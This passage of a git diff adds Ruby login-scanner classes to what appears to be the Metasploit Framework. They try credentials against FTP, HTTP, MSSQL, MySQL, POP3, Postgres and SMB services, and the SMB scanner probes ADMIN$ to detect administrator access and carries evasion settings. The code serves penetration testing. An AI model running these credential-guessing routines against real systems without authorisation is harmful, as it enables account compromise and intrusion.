+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Ftp::Client
+
+        DEFAULT_PORT         = 21
+        LIKELY_PORTS         = [ DEFAULT_PORT, 2121 ]
+        LIKELY_SERVICE_NAMES = [ 'ftp' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY           = nil
+
+        # @!attribute ftp_timeout
+        #   @return [Fixnum] The timeout in seconds to wait for a response to an FTP command
+        attr_accessor :ftp_timeout
+
+        validates :ftp_timeout,
+                  presence: true,
+                  numericality: {
+                      only_integer:             true,
+                      greater_than_or_equal_to: 1
+                  }
+
+
+
+        # (see Base#attempt_login)
+        def attempt_login(credential)
+          result_options = {
+              credential: credential
+          }
+
+          begin
+            success = connect_login(credential.public, credential.private)
+          rescue ::EOFError,  Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
+            result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            success = false
+          end
+
+
+          if success
+            result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+          elsif !(result_options.has_key? :status)
+            result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
+          end
+
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+
+        end
+
+        private
+
+        # This method sets the sane defaults for things
+        # like timeouts and TCP evasion options
+        def set_sane_defaults
+          self.connection_timeout ||= 30
+          self.port               ||= DEFAULT_PORT
+          self.max_send_size      ||= 0
+          self.send_delay         ||= 0
+          self.ftp_timeout        ||= 16
+        end
+
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/http.rb b/lib/metasploit/framework/login_scanner/http.rb
new file mode 100644
index 0000000000..4518ef2ef5
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/http.rb
@@ -0,0 +1,123 @@
+require 'rex/proto/http'
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      #
+      # HTTP-specific login scanner.
+      #
+      class HTTP
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+
+        DEFAULT_REALM        = nil
+        DEFAULT_PORT         = 80
+        DEFAULT_SSL_PORT     = 443
+        LIKELY_PORTS         = [ 80, 443, 8000, 8080 ]
+        LIKELY_SERVICE_NAMES = [ 'http', 'https' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+
+        # @!attribute uri
+        #   @return [String] The path and query string on the server to
+        #     authenticate to.
+        attr_accessor :uri
+
+        # @!attribute uri
+        #   @return [String] HTTP method, e.g. "GET", "POST"
+        attr_accessor :method
+
+        validates :uri, presence: true, length: { minimum: 1 }
+
+        validates :method,
+                  presence: true,
+                  length: { minimum: 1 }
+
+        # Attempt a single login with a single credential against the target.
+        #
+        # @param credential [Credential] The credential object to attempt to
+        #   login with.
+        # @return [Result] A Result object indicating success or failure
+        def attempt_login(credential)
+          ssl = false if ssl.nil?
+
+          result_opts = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            proof: nil
+          }
+
+          http_client = Rex::Proto::Http::Client.new(
+            host, port, {}, ssl, ssl_version,
+            nil, credential.public, credential.private
+          )
+          if credential.realm
+            http_client.set_config('domain' => credential.realm)
+          end
+
+          begin
+            http_client.connect
+            request = http_client.request_cgi(
+              'uri' => uri,
+              'method' => method
+            )
+
+            # First try to connect without logging in to make sure this
+            # resource requires authentication. We use #_send_recv for
+            # that instead of #send_recv.
+            response = http_client._send_recv(request)
+            if response && response.code == 401 && response.headers['WWW-Authenticate']
+              # Now send the creds
+              response = http_client.send_auth(
+                response, request.opts, connection_timeout, true
+              )
+              if response && response.code == 200
+                result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: response.headers)
+              end
+            else
+              result_opts.merge!(status: Metasploit::Model::Login::Status::NO_AUTH_REQUIRED)
+            end
+          rescue ::EOFError, Rex::ConnectionError, ::Timeout::Error
+            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+          ensure
+            http_client.close
+          end
+
+          Result.new(result_opts)
+        end
+
+        private
+
+        # This method sets the sane defaults for things
+        # like timeouts and TCP evasion options
+        def set_sane_defaults
+          self.connection_timeout ||= 20
+          self.max_send_size = 0 if self.max_send_size.nil?
+          self.send_delay = 0 if self.send_delay.nil?
+          self.uri = '/' if self.uri.blank?
+          self.method = 'GET' if self.method.blank?
+
+          # Note that this doesn't cover the case where ssl is unset and
+          # port is something other than a default. In that situtation,
+          # we don't know what the user has in mind so we have to trust
+          # that they're going to do something sane.
+          if !(self.ssl) && self.port.nil?
+            self.port = self.class::DEFAULT_PORT
+            self.ssl = false
+          elsif self.ssl && self.port.nil?
+            self.port = self.class::DEFAULT_SSL_PORT
+          elsif self.ssl.nil? && self.port == self.class::DEFAULT_PORT
+            self.ssl = false
+          elsif self.ssl.nil? && self.port == self.class::DEFAULT_SSL_PORT
+            self.ssl = true
+          end
+
+          nil
+        end
+
+      end
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/invalid.rb b/lib/metasploit/framework/login_scanner/invalid.rb
new file mode 100644
index 0000000000..73799a0479
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/invalid.rb
@@ -0,0 +1,22 @@
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This class is the generic Exception raised by LoginScanners when
+      # they fail validation. It rolls up all validation errors into a
+      # single exception so that all errors can be dealt with at once.
+      class Invalid < StandardError
+
+        attr_reader :model
+
+        def initialize(model)
+          @model = model
+
+          errors = @model.errors.full_messages.join(', ')
+          super(errors)
+        end
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/mssql.rb b/lib/metasploit/framework/login_scanner/mssql.rb
new file mode 100644
index 0000000000..ef2785e5ed
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/mssql.rb
@@ -0,0 +1,74 @@
+require 'metasploit/framework/mssql/client'
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+require 'metasploit/framework/login_scanner/ntlm'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with Microsoft SQL Servers.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results
+      class MSSQL
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::LoginScanner::NTLM
+        include Metasploit::Framework::MSSQL::Client
+
+        DEFAULT_PORT         = 1433
+        DEFAULT_REALM         = 'WORKSTATION'
+        # Lifted from lib/msf/core/exploit/mssql.rb
+        LIKELY_PORTS         = [ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ]
+        # Lifted from lib/msf/core/exploit/mssql.rb
+        LIKELY_SERVICE_NAMES = [ 'ms-sql-s', 'ms-sql2000', 'sybase' ]
+        PRIVATE_TYPES        = [ :password, :ntlm_hash ]
+        REALM_KEY           = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+
+        # @!attribute windows_authentication
+        #   @return [Boolean] Whether to use Windows Authentication instead of SQL Server Auth.
+        attr_accessor :windows_authentication
+
+        validates :windows_authentication,
+          inclusion: { in: [true, false] }
+
+        def attempt_login(credential)
+          result_options = {
+              credential: credential
+          }
+
+          begin
+            if mssql_login(credential.public, credential.private, '', credential.realm)
+              result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+            else
+              result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
+            end
+          rescue ::Rex::ConnectionError
+            result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+          end
+
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+
+        private
+
+        def set_sane_defaults
+          self.connection_timeout    ||= 30
+          self.port                  ||= DEFAULT_PORT
+          self.max_send_size         ||= 0
+          self.send_delay            ||= 0
+
+          # Don't use ||= with booleans
+          self.send_lm                = true if self.send_lm.nil?
+          self.send_ntlm              = true if self.send_ntlm.nil?
+          self.send_spn               = true if self.send_spn.nil?
+          self.use_lmkey              = false if self.use_lmkey.nil?
+          self.use_ntlm2_session      = true if self.use_ntlm2_session.nil?
+          self.use_ntlmv2             = true if self.use_ntlmv2.nil?
+          self.windows_authentication = false if self.windows_authentication.nil?
+        end
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/mysql.rb b/lib/metasploit/framework/login_scanner/mysql.rb
new file mode 100644
index 0000000000..6212cd8b12
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/mysql.rb
@@ -0,0 +1,91 @@
+require 'metasploit/framework/tcp/client'
+require 'rbmysql'
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with MySQL Database servers.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class MySQL
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Tcp::Client
+
+        DEFAULT_PORT         = 3306
+        LIKELY_PORTS         = [ 3306 ]
+        LIKELY_SERVICE_NAMES = [ 'mysql' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY           = nil
+
+        def attempt_login(credential)
+          result_options = {
+              credential: credential
+          }
+
+          # manage our behind the scenes socket. Close any existing one and open a new one
+          disconnect if self.sock
+          connect
+
+          begin
+            ::RbMysql.connect({
+              :host           => host,
+              :port           => port,
+              :read_timeout   => 300,
+              :write_timeout  => 300,
+              :socket         => sock,
+              :user           => credential.public,
+              :password       => credential.private,
+              :db             => ''
+            })
+          rescue Errno::ECONNREFUSED
+            result_options.merge!({
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
+              proof: "Connection refused"
+            })
+          rescue RbMysql::ClientError
+            result_options.merge!({
+                status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
+                proof: "Connection timeout"
+            })
+          rescue Errno::ETIMEDOUT
+            result_options.merge!({
+                status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
+                proof: "Operation Timed out"
+            })
+          rescue RbMysql::HostNotPrivileged
+            result_options.merge!({
+                status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
+                proof: "Unable to login from this host due to policy"
+            })
+          rescue RbMysql::AccessDeniedError
+            result_options.merge!({
+                status: Metasploit::Model::Login::Status::INCORRECT,
+                proof: "Access Denied"
+            })
+          end
+
+          unless result_options[:status]
+            result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+          end
+
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+
+        # This method sets the sane defaults for things
+        # like timeouts and TCP evasion options
+        def set_sane_defaults
+          self.connection_timeout ||= 30
+          self.port               ||= DEFAULT_PORT
+          self.max_send_size      ||= 0
+          self.send_delay         ||= 0
+        end
+
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/ntlm.rb b/lib/metasploit/framework/login_scanner/ntlm.rb
new file mode 100644
index 0000000000..73cdfef6dc
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/ntlm.rb
@@ -0,0 +1,61 @@
+require 'metasploit/framework/login_scanner'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This Concern provides the basic accessors and validations
+      # for protocols that require the use of NTLM for Authentication.
+      module NTLM
+        extend ActiveSupport::Concern
+        include ActiveModel::Validations
+
+        included do
+          # @!attribute send_lm
+          #   @return [Boolean] Whether to always send the LANMAN response(except if using NTLM2 Session)
+          attr_accessor :send_lm
+
+          # @!attribute send_ntlm
+          #   @return [Boolean] Whether to use NTLM responses
+          attr_accessor :send_ntlm
+
+          # @!attribute send_spn
+          #   @return [Boolean] Whether to support SPN for newer Windows OSes
+          attr_accessor :send_spn
+
+          # @!attribute use_lmkey
+          #   @return [Boolean] Whether to negotiate with a LANMAN key
+          attr_accessor :use_lmkey
+
+          # @!attribute send_lm
+          #   @return [Boolean] Whether to force the use of NTLM2 session
+          attr_accessor :use_ntlm2_session
+
+          # @!attribute send_lm
+          #   @return [Boolean] Whether to force the use of NTLMv2 instead of NTLM2 Session
+          attr_accessor :use_ntlmv2
+
+          validates :send_lm,
+                    inclusion: { in: [true, false] }
+
+          validates :send_ntlm,
+                    inclusion: { in: [true, false] }
+
+          validates :send_spn,
+                    inclusion: { in: [true, false] }
+
+          validates :use_lmkey,
+                    inclusion: { in: [true, false] }
+
+          validates :use_ntlm2_session,
+                    inclusion: { in: [true, false] }
+
+          validates :use_ntlmv2,
+                    inclusion: { in: [true, false] }
+        end
+
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/pop3.rb b/lib/metasploit/framework/login_scanner/pop3.rb
new file mode 100644
index 0000000000..9bf9491029
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/pop3.rb
@@ -0,0 +1,87 @@
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+require 'metasploit/framework/tcp/client'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with POP3.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class POP3
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Tcp::Client
+
+        DEFAULT_PORT         = 110
+        LIKELY_PORTS         = [ 110, 995 ]
+        LIKELY_SERVICE_NAMES = [ 'pop3', 'pop3s' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = nil
+
+        # This method attempts a single login with a single credential against the target
+        # @param credential [Credential] The credential object to attempt to login with
+        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
+        def attempt_login(credential)
+          result_options = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT
+          }
+
+          disconnect if self.sock
+
+          begin
+            connect
+            select([sock],nil,nil,0.4)
+
+            # Check to see if we recieved an OK?
+            result_options[:proof] = sock.get_once
+            if result_options[:proof] && result_options[:proof][/^\+OK.*/]
+              # If we received an OK we should send the USER
+              sock.put("USER #{credential.public}\r\n")
+              result_options[:proof] = sock.get_once
+
+              if result_options[:proof] && result_options[:proof][/^\+OK.*/]
+                # If we got an OK after the username we can send the PASS
+                sock.put("PASS #{credential.private}\r\n")
+                # Dovecot has a failed-auth penalty system that maxes at
+                # sleeping for 15 seconds before sending responses to the
+                # PASS command, so bump the timeout to 16.
+                result_options[:proof] = sock.get_once(-1, 16)
+
+                if result_options[:proof] && result_options[:proof][/^\+OK.*/]
+                  # if the pass gives an OK, were good to go
+                  result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+                end
+              end
+            end
+
+          rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e
+            result_options.merge!(
+              proof: e.message,
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            )
+          end
+
+          disconnect if self.sock
+
+          Result.new(result_options)
+        end
+
+        private
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          self.connection_timeout ||= 30
+          self.port               ||= DEFAULT_PORT
+          self.max_send_size      ||= 0
+          self.send_delay         ||= 0
+        end
+
+      end
+
+    end
+  end
+end
+
diff --git a/lib/metasploit/framework/login_scanner/postgres.rb b/lib/metasploit/framework/login_scanner/postgres.rb
new file mode 100644
index 0000000000..a5cc685ed2
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/postgres.rb
@@ -0,0 +1,79 @@
+require 'metasploit/framework/login_scanner/base'
+require 'postgres_msf'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with PostgreSQL database servers.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class Postgres
+        include Metasploit::Framework::LoginScanner::Base
+
+        DEFAULT_PORT         = 5432
+        DEFAULT_REALM        = 'template1'
+        LIKELY_PORTS         = [ DEFAULT_PORT ]
+        LIKELY_SERVICE_NAMES = [ 'postgres' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = Metasploit::Model::Realm::Key::POSTGRESQL_DATABASE
+
+        # This method attempts a single login with a single credential against the target
+        # @param credential [Credential] The credential object to attmpt to login with
+        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
+        def attempt_login(credential)
+          result_options = {
+              credential: credential
+          }
+
+          db_name = credential.realm || 'template1'
+
+          if ::Rex::Socket.is_ipv6?(host)
+            uri = "tcp://[#{host}]:#{port}"
+          else
+            uri = "tcp://#{host}:#{port}"
+          end
+
+          pg_conn = nil
+
+          begin
+            pg_conn = Msf::Db::PostgresPR::Connection.new(db_name,credential.public,credential.private,uri)
+          rescue RuntimeError => e
+            case e.to_s.split("\t")[1]
+              when "C3D000"
+                result_options.merge!({
+                  status: Metasploit::Model::Login::Status::INCORRECT,
+                  proof: "C3D000, Creds were good but database was bad"
+                })
+              when "C28000", "C28P01"
+                result_options.merge!({
+                    status: Metasploit::Model::Login::Status::INCORRECT,
+                    proof: "Invalid username or password"
+                })
+              else
+                result_options.merge!({
+                    status: Metasploit::Model::Login::Status::INCORRECT,
+                    proof: e.message
+                })
+            end
+          end
+
+          if pg_conn
+            pg_conn.close
+            result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+          else
+            result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
+          end
+
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+      end
+
+      def set_sane_defaults
+        self.connection_timeout ||= 30
+        self.port               ||= DEFAULT_PORT
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/result.rb b/lib/metasploit/framework/login_scanner/result.rb
new file mode 100644
index 0000000000..9f520ef15b
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/result.rb
@@ -0,0 +1,54 @@
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # The Result class provides a standard structure in which
+      # LoginScanners can return the result of a login attempt
+
+      class Result
+        include ActiveModel::Validations
+
+        # @!attribute [r] access_level
+        #   @return [String] the access level gained
+        attr_reader :access_level
+        # @!attribute [r] credential
+        #   @return [Credential] the Credential object the result is for
+        attr_reader :credential
+        # @!attribute [r] proof
+        #   @return [String,nil] the proof that the lgoin was successful
+        attr_reader :proof
+        # @!attribute [r] status
+        #   @return [String] the status of the attempt. Should be a member of `Metasploit::Model::Login::Status::ALL`
+        attr_reader :status
+
+        validates :status,
+          inclusion: {
+              in: Metasploit::Model::Login::Status::ALL
+          }
+
+        # @param [Hash] opts The options hash for the initializer
+        # @option opts [String] :private The private credential component
+        # @option opts [String] :proof The proof that the login was successful
+        # @option opts [String] :public The public credential component
+        # @option opts [String] :realm The realm credential component
+        # @option opts [String] :status The status code returned
+        def initialize(opts= {})
+          @access_level = opts.fetch(:access_level, nil)
+          @credential   = opts.fetch(:credential)
+          @proof        = opts.fetch(:proof, nil)
+          @status       = opts.fetch(:status)
+        end
+
+        def success?
+          status == Metasploit::Model::Login::Status::SUCCESSFUL
+        end
+
+        def inspect
+          "#<#{self.class} #{credential.public}:#{credential.private}@#{credential.realm} #{status} >"
+        end
+
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/rex_socket.rb b/lib/metasploit/framework/login_scanner/rex_socket.rb
new file mode 100644
index 0000000000..da92873a02
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/rex_socket.rb
@@ -0,0 +1,64 @@
+require 'metasploit/framework/login_scanner'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This module provides the common mixin behaviour for
+      # LoginScanner objects that rely on Rex Sockets for their
+      # underlying communication.
+      module RexSocket
+        extend ActiveSupport::Concern
+
+        included do
+
+          # @!attribute max_send_size
+          #   @return [Fixnum] The max size of the data to encapsulate in a single packet
+          attr_accessor :max_send_size
+          # @!attribute send_delay
+          #   @return [Fixnum] The delay between sending packets
+          attr_accessor :send_delay
+          # @!attribute ssl
+          #   @return [Boolean] Whether the socket should use ssl
+          attr_accessor :ssl
+          # @!attribute ssl_version
+          #   @return [String] The version of SSL to implement
+          attr_accessor :ssl_version
+
+          validates :max_send_size,
+                    presence: true,
+                    numericality: {
+                        only_integer:             true,
+                        greater_than_or_equal_to: 0
+                    }
+
+          validates :send_delay,
+                    presence: true,
+                    numericality: {
+                        only_integer:             true,
+                        greater_than_or_equal_to: 0
+                    }
+
+
+          private
+
+          def chost
+            '0.0.0.0'
+          end
+
+          def cport
+            0
+          end
+
+          def rhost
+            host
+          end
+
+          def rport
+            port
+          end
+        end
+      end
+    end
+  end
+end
diff --git a/lib/metasploit/framework/login_scanner/smb.rb b/lib/metasploit/framework/login_scanner/smb.rb
new file mode 100644
index 0000000000..0daa4ad0f2
--- /dev/null
+++ b/lib/metasploit/framework/login_scanner/smb.rb
@@ -0,0 +1,265 @@
+require 'rex/proto/smb'
+require 'metasploit/framework'
+require 'metasploit/framework/tcp/client'
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+require 'metasploit/framework/login_scanner/ntlm'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with the Server Messaging
+      # Block protocol.
+      class SMB
+        include Metasploit::Framework::Tcp::Client
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::LoginScanner::NTLM
+
+        # Constants to be used in {Result#access_level}
+        module AccessLevels
+          # Administrative access. For SMB, this is defined as being
+          # able to successfully Tree Connect to the `ADMIN$` share.
+          # This definition is not without its problems, but suffices to
+          # conclude that such a user will most likely be able to use
+          # psexec.
+          ADMINISTRATOR = "Administrator"
+          # Guest access means our creds were accepted but the logon
+          # session is not associated with a real user account.
+          GUEST = "Guest"
+        end
+
+        CAN_GET_SESSION      = true
+        DEFAULT_REALM        = 'WORKSTATION'
+        LIKELY_PORTS         = [ 139, 445 ]
+        LIKELY_SERVICE_NAMES = [ "smb" ]
+        PRIVATE_TYPES        = [ :password, :ntlm_hash ]
+        REALM_KEY            = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+
+        module StatusCodes
+          CORRECT_CREDENTIAL_STATUS_CODES = [
+            "STATUS_ACCOUNT_DISABLED",
+            "STATUS_ACCOUNT_EXPIRED",
+            "STATUS_ACCOUNT_RESTRICTION",
+            "STATUS_INVALID_LOGON_HOURS",
+            "STATUS_INVALID_WORKSTATION",
+            "STATUS_LOGON_TYPE_NOT_GRANTED",
+            "STATUS_PASSWORD_EXPIRED",
+            "STATUS_PASSWORD_MUST_CHANGE",
+          ].freeze.map(&:freeze)
+        end
+
+
+        # @!attribute simple
+        #   @return [Rex::Proto::SMB::SimpleClient]
+        attr_accessor :simple
+
+        attr_accessor :smb_chunk_size
+        attr_accessor :smb_name
+        attr_accessor :smb_native_lm
+        attr_accessor :smb_native_os
+        attr_accessor :smb_obscure_trans_pipe_level
+        attr_accessor :smb_pad_data_level
+        attr_accessor :smb_pad_file_level
+        attr_accessor :smb_pipe_evasion
+
+        # UNUSED
+        #attr_accessor :smb_pipe_read_max_size
+        #attr_accessor :smb_pipe_read_min_size
+        #attr_accessor :smb_pipe_write_max_size
+        #attr_accessor :smb_pipe_write_min_size
+        attr_accessor :smb_verify_signature
+
+        attr_accessor :smb_direct
+
+        validates :smb_chunk_size,
+                  numericality:
+                  {
+                    only_integer: true,
+                    greater_than_or_equal_to: 0
+                  }
+
+        validates :smb_obscure_trans_pipe_level,
+                  inclusion:
+                  {
+                    in: Rex::Proto::SMB::Evasions::EVASION_NONE .. Rex::Proto::SMB::Evasions::EVASION_MAX
+                  }
+
+        validates :smb_pad_data_level,
+                  inclusion:
+                  {
+                    in: Rex::Proto::SMB::Evasions::EVASION_NONE .. Rex::Proto::SMB::Evasions::EVASION_MAX
+                  }
+
+        validates :smb_pad_file_level,
+                  inclusion:
+                  {
+                    in: Rex::Proto::SMB::Evasions::EVASION_NONE .. Rex::Proto::SMB::Evasions::EVASION_MAX
+                  }
+
+        validates :smb_pipe_evasion,
+                  inclusion: { in: [true, false, nil] },
+                  allow_nil: true
+
+        # UNUSED
+        #validates :smb_pipe_read_max_size, numericality: { only_integer: true }
+        #validates :smb_pipe_read_min_size, numericality: { only_integer: true, greater_than_or_equal_to: 0 }
+        #validates :smb_pipe_write_max_size, numericality: { only_integer: true }
+        #validates :smb_pipe_write_min_size, numericality: { only_integer: true, greater_than_or_equal_to: 0 }
+
+        validates :smb_verify_signature,
+                  inclusion: { in: [true, false, nil] },
+                  allow_nil: true
+
+
+        # If login is successul and {Result#access_level} is not set
+        # then arbitrary credentials are accepted. If it is set to
+        # Guest, then arbitrary credentials are accepted, but given
+        # Guest permissions.
+        #
+        # @param domain [String] Domain to authenticate against. Use an
+        #   empty string for local accounts.
+        # @return [Result]
+        def attempt_bogus_login(domain)
+          if defined?(@result_for_bogus)
+            return @result_for_bogus
+          end
+          cred = Credential.new(
+            public: Rex::Text.rand_text_alpha(8),
+            private: Rex::Text.rand_text_alpha(8),
+            realm: domain
+          )
+          @result_for_bogus = attempt_login(cred)
+        end
+
+
+        # (see Base#attempt_login)
+        def attempt_login(credential)
+
+          # Disable direct SMB when SMBDirect has not been set and the
+          # destination port is configured as 139
+          if self.smb_direct.nil?
+            self.smb_direct = case self.port
+                              when 139 then false
+                              when 445 then true
+                              end
+          end
+
+          begin
+            connect
+          rescue ::Rex::ConnectionError => e
+            return Result.new(credential:credential, status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
+          end
+          proof = nil
+
+          begin
+            # TODO: OMG
+            simple.login(
+              smb_name,
+              credential.public,
+              credential.private,
+              credential.realm || "",
+              smb_verify_signature,
+              use_ntlmv2,
+              use_ntlm2_session,
+              send_lm,
+              use_lmkey,
+              send_ntlm,
+              smb_native_os,
+              smb_native_lm,
+              {
+                use_spn: send_spn,
+                name: host
+              }
+            )
+
+            # Windows SMB will return an error code during Session
+            # Setup, but nix Samba requires a Tree Connect. Try admin$
+            # first, since that will tell us if this user has local
+            # admin access. Fall back to IPC$ which should be accessible
+            # to any user with valid creds.
+            begin
+              simple.connect("\\\\#{host}\\admin$")
+              access_level = AccessLevels::ADMINISTRATOR
+              simple.disconnect("\\\\#{host}\\admin$")
+            rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
+              simple.connect("\\\\#{host}\\IPC$")
+            end
+
+            # If we made it this far without raising, we have a valid
+            # login
+            status = Metasploit::Model::Login::Status::SUCCESSFUL
+          rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
+            status = case e.get_error(e.error_code)
+                     when *StatusCodes::CORRECT_CREDENTIAL_STATUS_CODES
+                       Metasploit::Model::Login::Status::DENIED_ACCESS
+                     when 'STATUS_LOGON_FAILURE', 'STATUS_ACCESS_DENIED'
+                       Metasploit::Model::Login::Status::INCORRECT
+                     else
+                       Metasploit::Model::Login::Status::INCORRECT
+                     end
+
+            proof = e
+          rescue ::Rex::Proto::SMB::Exceptions::Error => e
+            status = Metasploit::Model::Login::Status::INCORRECT
+            proof = e
+          rescue ::Rex::ConnectionError
+            status = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+          end
+
+          if status == Metasploit::Model::Login::Status::SUCCESSFUL && simple.client.auth_user.nil?
+            access_level ||= AccessLevels::GUEST
+          end
+
+          Result.new(credential: credential, status: status, proof: proof, access_level: access_level)
+        end
+
+        def connect
+          disconnect
+          self.sock = super
+
+          c = Rex::Proto::SMB::SimpleClient.new(sock, smb_direct)
+
+          c.client.evasion_opts['pad_data'] = smb_pad_data_level
+          c.client.evasion_opts['pad_file'] = smb_pad_file_level
+          c.client.evasion_opts['obscure_trans_pipe'] = smb_obscure_trans_pipe_level
+
+          self.simple = c
+          c
+        end
+
+        def set_sane_defaults
+          self.connection_timeout           = 10 if self.connection_timeout.nil?
+          self.max_send_size                = 0 if self.max_send_size.nil?
+          self.send_delay                   = 0 if self.send_delay.nil?
+          self.send_lm                      = true if self.send_lm.nil?
+          self.send_ntlm                    = true if self.send_ntlm.nil?
+          self.send_spn                     = true if self.send_spn.nil?
+          self.smb_chunk_size               = 0 if self.smb_chunk_size.nil?
+          self.smb_name                     = "*SMBSERVER" if self.smb_name.nil?
+          self.smb_native_lm                = "Windows 2000 5.0" if self.smb_native_os.nil?
+          self.smb_native_os                = "Windows 2000 2195" if self.smb_native_os.nil?
+          self.smb_obscure_trans_pipe_level = 0 if self.smb_obscure_trans_pipe_level.nil?
+          self.smb_pad_data_level           = 0 if self.smb_pad_data_level.nil?
+          self.smb_pad_file_level           = 0 if self.smb_pad_file_level.nil?
+          self.smb_pipe_evasion             = false if self.smb_pipe_evasion.nil?
+          #self.smb_pipe_read_max_size       = 1024 if self.smb_pipe_read_max_size.nil?
+          #self.smb_pipe_read_min_size       = 0 if self.smb_pipe_read_min_size.nil?
+          #self.smb_pipe_write_max_size      = 1024 if self.smb_pipe_write_max_size.nil?
+          #self.smb_pipe_write_min_size      = 0 if self.smb_pipe_write_min_size.nil?
+          self.smb_verify_signature         = false if self.smb_verify_signature.nil?
+
+          self.use_lmkey              = true if self.use_lmkey.nil?
+          self.use_ntlm2_session            = true if self.use_ntlm2_session.nil?
+          self.use_ntlmv2                   = true if self.use_ntlmv2.nil?
+
+          self.smb_name = self.host if self.smb_name.nil?
+
+        end
+
+      end
+    end
+  end
+end
+
diff --git a/lib/metasploit/framework/login_scanner/snmp.rb b/lib/metasploit/framework/login_scanner/snmp.rb
